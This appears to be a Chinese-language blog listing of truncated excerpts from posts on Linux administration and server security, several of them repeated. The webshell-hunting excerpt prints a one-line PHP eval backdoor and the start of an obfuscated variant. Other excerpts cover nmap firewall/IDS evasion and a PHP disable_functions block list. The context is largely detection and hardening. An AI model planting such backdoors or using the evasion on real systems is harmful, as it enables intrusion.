原创 wireshark使用說明

1.過濾IP,如來源IP或者目標IP等於某個IP例子:ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107或者ip.addr eq 192.168.1.107 // 都能顯示來源IP和目標IP

原创 linux運維常用命令

系統# uname -a # 查看內核/操作系統/CPU信息# head -n 1 /etc/issue # 查看操作系統版本# cat /proc/cpuinfo # 查看CPU信息# hostname # 查看計算機名# lspci -

原创 linux查找webshell

首先認識一下小馬,一般大馬容易暴露,駭客都會留一手,把小馬加入正常PHP文件裏面<?php eval ($_POST[a]);?>//密碼爲a,使用中國菜刀連接隱藏很深的小馬fputs(fopen(chr(46).chr(47).chr(9

原创 linux僞裝隱藏Nginx,PHP版本號提升服務器安全性

一、隱藏Nginx版本號第一步:vi /usr/local/nginx/conf/nginx.conf在http{}中加入server_tokens off;第二歩:vi /usr/local/nginx/conf/fastcgi_para

原创 linux查找webshell

首先認識一下小馬,一般大馬容易暴露,駭客都會留一手,把小馬加入正常PHP文件裏面<?php eval ($_POST[a]);?>//密碼爲a,使用中國菜刀連接隱藏很深的小馬fputs(fopen(chr(46).chr(47).chr(9

原创 python3黑帽子mbp版(第2章:網絡基礎)

寫在最前面的話:很早之前就想學python了,趁着買來了書,打算開始python學習之旅。先說下我的工具:使用的是sublime text3編輯器,主要使用的網站是廖雪峯老師的網站,借鑑了很多ODboy博客中的知識點。tcp客戶端#!/us

原创 linux查找webshell

首先認識一下小馬,一般大馬容易暴露,駭客都會留一手,把小馬加入正常PHP文件裏面<?php eval ($_POST[a]);?>//密碼爲a,使用中國菜刀連接隱藏很深的小馬fputs(fopen(chr(46).chr(47).chr(9

原创 nmap繞過WAF

1、碎片化    Nmap發送8個字節的數據包繞過防火牆/IDS/IPS。這種技術已經很古老了,但是在防火牆配置不當的時候依舊有用。Nmap -f hostMTU,最大傳輸單元,它是碎片化的別名,我們可以指定它的大小。Nmap --mtu

原创 linux運維常用命令

系統# uname -a # 查看內核/操作系統/CPU信息# head -n 1 /etc/issue # 查看操作系統版本# cat /proc/cpuinfo # 查看CPU信息# hostname # 查看計算機名# lspci -

原创 linux下nginx apache lighttpd 禁止某些目錄執行php

爲了加強網站安全性,我們除了限制目錄權限外,還需要禁用某此目錄禁止執行php。在IIS中可以直接將目錄的腳本執行權限去掉,而針對非windows系統如何做呢?接下來的文章將簡單的介紹不同的webserver如何禁用php執行。。。。php命

原创 linux查CC***

查看所有80端口的連接數netstat -nat|grep -i "80"|wc -l對連接的IP按連接數量進行排序netstat -anp | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f

原创 linux查找webshell

首先認識一下小馬,一般大馬容易暴露,駭客都會留一手,把小馬加入正常PHP文件裏面<?php eval ($_POST[a]);?>//密碼爲a,使用中國菜刀連接隱藏很深的小馬fputs(fopen(chr(46).chr(47).chr(9

原创 linux服務器內核網絡參數優化

由於TCP協議缺陷被惡意利用Syn-Flood***,Linux內核調整這些參數可緩解這類***:net.ipv4.tcp_syncookies = 1#啓用syncookiesnet.ipv4.tcp_max_syn_backlog =

原创 linux下PHP網站安全加固方案

PHP安全配置1. 確保運行php的用戶爲一般用戶,如www2. php.ini參數設置1    disable_functions = passthru,exec,system,chroot,chgrp,chown,shell_exec,